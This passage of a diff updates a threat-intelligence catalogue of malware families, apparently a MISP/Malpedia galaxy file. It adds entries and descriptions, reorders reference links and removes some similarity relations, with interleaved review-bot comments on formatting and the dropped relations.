- "https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin"
+ "https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin",
+ "https://twitter.com/malwrhunterteam/status/910952333084971008"
],
"synonyms": [],
"type": []
@@ -34324,6 +36175,23 @@
"uuid": "25a5ded7-6167-4f9a-b55d-9cfc9a9a9f22",
"value": "NuggetPhantom"
},
+ {
+ "description": "Nullmixer is a dropper/loader for additional malware. It is known to drop a vast amount of different malware, such as info stealers, rats and additional loaders. Samples observed contained up to 8 additional payloads.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nullmixer",
+ "https://www.youtube.com/watch?v=v_K_zoPGpdk",
+ "https://www.youtube.com/watch?v=yLQfDk3dVmA",
+ "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
+ "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1",
+ "https://www.youtube.com/watch?v=92jKJ_G_6ho"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "430c92f4-95b4-4b1c-813a-46d3e53a0d1e",
+ "value": "Nullmixer"
+ },
{
"description": "",
"meta": {
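Review bot: in the new Nullmixer description, "rats" should read "RATs", matching the capitalisation used for the NjRAT and ObliqueRAT clusters in this file; the description is otherwise clear about the loader's role. Three of the six refs are bare YouTube links, which is acceptable but gives readers no hint of the content before clicking.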
@@ -34344,8 +36212,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nvisospit",
"http://www.isg.rhul.ac.uk/dl/weekendconference2014/slides/Erik_VanBuggenhout.pdf",
- "https://twitter.com/Bank_Security/status/1134850646413385728",
- "https://twitter.com/r3c0nst/status/1135606944427905025"
+ "https://twitter.com/r3c0nst/status/1135606944427905025",
+ "https://twitter.com/Bank_Security/status/1134850646413385728"
],
"synonyms": [],
"type": []
@@ -34359,8 +36227,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nworm",
"https://www.secuinfra.com/en/techtalk/n-w0rm-analysis-part-2/",
- "https://bazaar.abuse.ch/browse/tag/N-W0rm/",
- "https://www.secuinfra.com/en/techtalk/n-w0rm-analysis-part-1/"
+ "https://www.secuinfra.com/en/techtalk/n-w0rm-analysis-part-1/",
+ "https://bazaar.abuse.ch/browse/tag/N-W0rm/"
],
"synonyms": [
"NWorm",
@@ -34372,39 +36240,32 @@
"value": "N-W0rm"
},
{
- "description": "",
+ "description": "Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim",
- "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf",
+ "https://blog.talosintelligence.com/goznym/",
+ "https://securityintelligence.com/posts/goznym-closure-comes-in-the-shape-of-a-europol-and-doj-arrest-operation/",
+ "https://www.sentinelone.com/blog/goznym-banking-malware-gang-busted/",
"https://www.cert.pl/en/news/single/nymaim-revisited/",
- "https://www.justice.gov/opa/pr/goznym-cyber-criminal-network-operating-out-europe-targeting-american-entities-dismantled",
"https://www.shadowserver.org/news/goznym-indictments-action-following-on-from-successful-avalanche-operations/",
+ "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf",
+ "https://www.proofpoint.com/us/what-old-new-again-nymaim-moves-past-its-ransomware-roots-0",
+ "https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim",
"https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/",
"https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/",
- "https://bitbucket.org/daniel_plohmann/idapatchwork",
- "https://www.proofpoint.com/us/threat-insight/post/nymaim-config-decoded",
- "https://www2.deloitte.com/content/dam/Deloitte/us/Documents/risk/us-aers-the-evolution-of-the-nymaim-criminal-enterprise.pdf",
- "https://www.proofpoint.com/us/what-old-new-again-nymaim-moves-past-its-ransomware-roots-0",
"https://www.lawfareblog.com/what-point-these-nation-state-indictments",
- "https://securityintelligence.com/posts/goznym-closure-comes-in-the-shape-of-a-europol-and-doj-arrest-operation/",
- "https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/"
+ "https://www.proofpoint.com/us/threat-insight/post/nymaim-config-decoded",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://www2.deloitte.com/content/dam/Deloitte/us/Documents/risk/us-aers-the-evolution-of-the-nymaim-criminal-enterprise.pdf",
+ "https://www.justice.gov/opa/pr/goznym-cyber-criminal-network-operating-out-europe-targeting-american-entities-dismantled",
+ "https://bitbucket.org/daniel_plohmann/idapatchwork"
],
"synonyms": [
"nymain"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "d36f4834-b958-4f32-aff0-5263e0034408",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "9b5255c6-44e5-4ec3-bc03-7e00e220c937",
"value": "Nymaim"
},
@@ -34413,8 +36274,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim2",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://johannesbader.ch/2018/04/the-new-domain-generation-algorithm-of-nymaim/"
+ "https://johannesbader.ch/2018/04/the-new-domain-generation-algorithm-of-nymaim/",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/"
],
"synonyms": [],
"type": []
@@ -34427,19 +36288,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.oblique_rat",
- "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/Earth%20Karkaddan%20APT-%20Adversary%20Intelligence%20and%20Monitoring%20Report.pdf",
- "https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html",
- "https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
"https://securelist.com/transparent-tribe-part-2/98233/",
"https://www.secrss.com/articles/24995",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/IoCs_Investigating%20APT36%20or%20Earth%20Karkaddan%20Attack%20Chain%20and%20Malware%20Arsenal.rtf",
- "https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/Earth%20Karkaddan%20APT-%20Adversary%20Intelligence%20and%20Monitoring%20Report.pdf",
+ "https://www.bleepingcomputer.com/news/security/hackers-use-modified-mfa-tool-against-indian-govt-employees/",
"https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html",
- "https://www.bleepingcomputer.com/news/security/hackers-use-modified-mfa-tool-against-indian-govt-employees/"
+ "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques",
+ "https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html",
+ "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html",
+ "https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/IoCs_Investigating%20APT36%20or%20Earth%20Karkaddan%20Attack%20Chain%20and%20Malware%20Arsenal.rtf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
],
"synonyms": [],
"type": []
@@ -34452,8 +36313,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.obscene",
- "https://sysopfb.github.io/malware/2020/02/28/Golang-Wrapper-on-an-old-malware.html",
- "https://habr.com/ru/post/27053/"
+ "https://habr.com/ru/post/27053/",
+ "https://sysopfb.github.io/malware/2020/02/28/Golang-Wrapper-on-an-old-malware.html"
],
"synonyms": [],
"type": []
@@ -34479,9 +36340,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.octopus",
+ "https://www.prodaft.com/m/reports/PAPERBUG_TLPWHITE-1.pdf",
"https://mp.weixin.qq.com/s/v1gi0bW79Ta644Dqer4qkw",
- "https://securelist.com/octopus-infested-seas-of-central-asia/88200/",
- "https://isc.sans.edu/diary/26918"
+ "https://isc.sans.edu/diary/26918",
+ "https://securelist.com/octopus-infested-seas-of-central-asia/88200/"
],
"synonyms": [],
"type": []
@@ -34498,15 +36360,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d20f9a41-db27-4d53-995e-547f86ff3d1e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d8305201-9fec-4e6b-9eec-7ebb756364e2",
"value": "OddJob"
},
@@ -34515,8 +36368,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.oderoor",
- "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
- "https://web.archive.org/web/20160324035554/https://www.johannesbader.ch/2015/12/krakens-two-domain-generation-algorithms//"
+ "https://web.archive.org/web/20160324035554/https://www.johannesbader.ch/2015/12/krakens-two-domain-generation-algorithms//",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf"
],
"synonyms": [
"Bobax",
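Review bot: this hunk only swaps the two Oderoor refs, but since both lines are being touched anyway it is the natural place to fix the stray trailing `//` in the archived johannesbader URL (`.../krakens-two-domain-generation-algorithms//`), which is carried over unchanged.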
@@ -34532,21 +36385,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff",
- "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
- "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks"
+ "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
+ "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "e2fa7aea-fb33-4efc-b61b-ccae71b32e7d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "045df65f-77fe-4880-af34-62ca33936c6e",
"value": "Odinaff"
},
@@ -34555,10 +36399,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.okrum",
- "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
"https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/",
- "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/",
- "https://securelist.com/apt-trends-report-q3-2020/99204/"
+ "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
+ "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/"
],
"synonyms": [],
"type": []
@@ -34571,24 +36415,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.oldbait",
- "https://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
"https://www.secjuice.com/fancy-bear-review/",
- "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf"
+ "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf",
+ "https://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf"
],
"synonyms": [
"Sasfis"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "6d1e2736-d363-49aa-9054-9c9e4ac0c520",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "b79a6b61-f122-4823-a4ab-bbab89fcaf75",
"value": "OLDBAIT"
},
@@ -34597,45 +36432,36 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer",
- "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/",
- "https://www.lastline.com/labsblog/attribution-from-russia-with-code/",
- "https://www.youtube.com/watch?v=wCv9SiSA7Sw",
- "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://www.endgame.com/blog/technical-blog/stopping-olympic-destroyer-new-process-injection-insights",
- "https://attack.mitre.org/groups/G0034",
- "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html",
- "https://www.lastline.com/labsblog/olympic-destroyer-south-korea/",
- "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
- "https://www.youtube.com/watch?v=a4BZ3SZN-CI",
- "https://securelist.com/the-devils-in-the-rich-header/84348/",
- "https://securelist.com/olympic-destroyer-is-still-alive/86169/",
- "https://www.wired.com/story/untold-story-2018-olympics-destroyer-cyberattack/",
- "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/",
- "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html",
- "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
- "https://securelist.com/apt-trends-report-q2-2020/97937/",
"https://www.youtube.com/watch?v=rjA0Vf75cYk",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://www.lastline.com/labsblog/olympic-destroyer-south-korea/",
+ "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html",
+ "https://www.lastline.com/labsblog/attribution-from-russia-with-code/",
+ "https://www.youtube.com/watch?v=1jgdMY12mI8",
+ "https://www.youtube.com/watch?v=wCv9SiSA7Sw",
+ "https://www.virusbulletin.com/virusbulletin/2018/10/vb2018-paper-who-wasnt-responsible-olympic-destroyer/",
"https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/",
+ "https://securelist.com/the-devils-in-the-rich-header/84348/",
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://www.youtube.com/watch?v=a4BZ3SZN-CI",
+ "https://attack.mitre.org/groups/G0034",
+ "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/",
+ "https://securelist.com/olympic-destroyer-is-still-alive/86169/",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
"https://www.mbsd.jp/blog/20180215.html",
"https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://www.youtube.com/watch?v=1jgdMY12mI8",
- "https://www.virusbulletin.com/virusbulletin/2018/10/vb2018-paper-who-wasnt-responsible-olympic-destroyer/"
+ "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
+ "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/",
+ "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html",
+ "https://www.wired.com/story/untold-story-2018-olympics-destroyer-cyberattack/",
+ "https://www.endgame.com/blog/technical-blog/stopping-olympic-destroyer-new-process-injection-insights",
+ "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too"
],
"synonyms": [
"SOURGRAPE"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "76d5c7a2-73c3-11e8-bd92-db4d715af093",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "f3ba8a50-0105-4aa9-90b2-01df15f50b28",
"value": "Olympic Destroyer"
},
@@ -34671,11 +36497,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke",
- "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/",
- "https://www.secureworks.com/research/threat-profiles/iron-hemlock",
+ "https://www.f-secure.com/weblog/archives/00002764.html",
"http://contagiodump.blogspot.com/2014/11/onionduke-samples.html",
+ "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/",
"https://blog.f-secure.com/podcast-dukes-apt29/",
- "https://www.f-secure.com/weblog/archives/00002764.html"
+ "https://www.secureworks.com/research/threat-profiles/iron-hemlock"
],
"synonyms": [],
"type": []
@@ -34688,8 +36514,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner",
- "https://www.blueliv.com/blog/research/analysis-spam-distribution-botnet-onliner-spambot/",
+ "https://outpost24.com/blog/an-analysis-of-a-spam-distribution-botnet",
"https://benkowlab.blogspot.com/2017/08/from-onliner-spambot-to-millions-of.html",
+ "https://www.blueliv.com/blog/research/analysis-spam-distribution-botnet-onliner-spambot/",
"https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html"
],
"synonyms": [
@@ -34707,10 +36534,10 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.oopsie",
"https://unit42.paloaltonetworks.com/atoms/evasive-serpens/",
- "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
- "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
"https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/",
- "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr"
+ "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
+ "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr",
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae"
],
"synonyms": [],
"type": []
@@ -34723,9 +36550,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki",
+ "http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html",
"http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html",
"https://isc.sans.edu/diary/Opachki%2C+from+%28and+to%29+Russia+with+love/7519",
- "http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html",
"https://forum.malekal.com/viewtopic.php?t=21806"
],
"synonyms": [],
@@ -34734,6 +36561,19 @@
"uuid": "f50de0a8-35a7-406e-9f53-8f7d5448e1e7",
"value": "Opachki"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.opcjacker",
+ "https://www.trendmicro.com/en_us/research/23/c/new-opcjacker-malware-distributed-via-fake-vpn-malvertising.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "22f732f4-efcf-4eb5-8c51-8338dfd33297",
+ "value": "OpcJacker"
+ },
{
"description": "",
"meta": {
@@ -34791,8 +36631,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat",
- "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html",
- "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood"
+ "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood",
+ "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html"
],
"synonyms": [],
"type": []
@@ -34805,9 +36645,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.orchard",
- "https://blog.netlab.360.com/orchard-dga/",
"https://bin.re/blog/a-dga-seeded-by-the-bitcoin-genesis-block/",
- "https://blog.netlab.360.com/a-new-botnet-orchard-generates-dga-domains-with-bitcoin-transaction-information/"
+ "https://malverse.it/stack-string-decryptor-con-ghidra-emulator-orchard",
+ "https://blog.netlab.360.com/a-new-botnet-orchard-generates-dga-domains-with-bitcoin-transaction-information/",
+ "https://blog.netlab.360.com/orchard-dga/"
],
"synonyms": [],
"type": []
@@ -34820,17 +36661,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://blog.checkpoint.com/2019/02/27/protecting-against-winrar-vulnerabilities/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
+ "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors",
"http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/",
- "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
"https://krebsonsecurity.com/2019/04/canadian-police-raid-orcus-rat-author/",
"https://www.canada.ca/en/radio-television-telecommunications/news/2019/03/crtc-and-rcmp-national-division-execute-warrants-in-malware-investigation.html",
- "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
+ "https://asec.ahnlab.com/en/45462/",
+ "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/",
+ "https://any.run/cybersecurity-blog/orcus-rat-malware-analysis/",
"https://assets.virustotal.com/reports/2021trends.pdf",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/"
+ "https://blog.checkpoint.com/2019/02/27/protecting-against-winrar-vulnerabilities/"
],
"synonyms": [
"Schnorchel"
@@ -34845,11 +36688,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ordinypt",
+ "https://www.carbonblack.com/2019/09/05/cb-threat-analysis-unit-technical-breakdown-germanwiper-ransomware/",
+ "https://dissectingmalwa.re/tfw-ransomware-is-only-your-side-hustle.html",
"https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/",
"https://www.gdata.de/blog/2017/11/30151-ordinypt",
- "https://www.carbonblack.com/2019/09/05/cb-threat-analysis-unit-technical-breakdown-germanwiper-ransomware/",
"https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://dissectingmalwa.re/tfw-ransomware-is-only-your-side-hustle.html",
"https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat"
],
"synonyms": [
@@ -34858,15 +36701,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "1d46f816-d159-4457-b98e-c34307d90655",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "7fd96553-4c78-43de-824f-82645ed4fac5",
"value": "Ordinypt"
},
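Review bot: Removing the `related` entry pointing at `1d46f816-d159-4457-b98e-c34307d90655` from Ordinypt raises the same concern as the Olympic Destroyer hunk above: a `similar` relation disappears without an explanation in the diff. If these relations were migrated or intentionally dropped, state that in the commit message.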
@@ -34888,15 +36722,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.oski",
- "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/",
- "https://www.cyberark.com/resources/threat-research-blog/meet-oski-stealer-an-in-depth-analysis-of-the-popular-credential-stealer",
- "https://3xp0rt.com/posts/mars-stealer",
- "https://medium.com/shallvhack/oski-stealer-a-credential-theft-malware-b9bba5164601",
- "https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become",
"https://cyberint.com/blog/research/mars-stealer/",
- "https://twitter.com/albertzsigovits/status/1160874557454131200",
+ "https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become",
+ "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/",
+ "https://medium.com/shallvhack/oski-stealer-a-credential-theft-malware-b9bba5164601",
+ "https://3xp0rt.com/posts/mars-stealer",
+ "https://labs.bitdefender.com/2020/03/new-router-dns-hijacking-attacks-abuse-bitbucket-to-host-infostealer/",
"https://drive.google.com/file/d/1c72YIF6JYcEvbFZCrkZO26D9hC3gnyMP/view",
- "https://labs.bitdefender.com/2020/03/new-router-dns-hijacking-attacks-abuse-bitbucket-to-host-infostealer/"
+ "https://twitter.com/albertzsigovits/status/1160874557454131200",
+ "https://www.cyberark.com/resources/threat-research-blog/meet-oski-stealer-an-in-depth-analysis-of-the-popular-credential-stealer",
+ "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468"
],
"synonyms": [],
"type": []
@@ -34953,8 +36788,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.outlook_backdoor",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://twitter.com/VK_Intel/status/1085820673811992576"
],
"synonyms": [
@@ -35026,10 +36861,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.owlproxy",
- "https://medium.com/cycraft/taiwan-government-targeted-by-multiple-cyberattacks-in-april-2020-3b20cea1dc20",
+ "https://lab52.io/blog/chimera-apt-updates-on-its-owlproxy-malware/",
"https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf",
"https://securelist.com/the-sessionmanager-iis-backdoor/106868/",
- "https://lab52.io/blog/chimera-apt-updates-on-its-owlproxy-malware/"
+ "https://medium.com/cycraft/taiwan-government-targeted-by-multiple-cyberattacks-in-april-2020-3b20cea1dc20"
],
"synonyms": [],
"type": []
@@ -35050,6 +36885,19 @@
"uuid": "aa985bc5-92e4-43c6-a01b-1de02818cfc9",
"value": "Owowa"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oxtarat",
+ "https://research.checkpoint.com/2023/operation-silent-watch-desktop-surveillance-in-azerbaijan-and-armenia/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a5b379c0-7934-4a50-9a34-7ad1524b1fb0",
+ "value": "OxtaRAT"
+ },
{
"description": "",
"meta": {
@@ -35082,8 +36930,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.padcrypt",
- "https://johannesbader.ch/2016/03/the-dga-of-padcrypt/",
- "https://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/"
+ "https://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/",
+ "https://johannesbader.ch/2016/03/the-dga-of-padcrypt/"
],
"synonyms": [],
"type": []
@@ -35096,8 +36944,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin",
- "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html",
- "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf"
+ "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf",
+ "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html"
],
"synonyms": [],
"type": []
@@ -35110,24 +36958,24 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker",
- "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
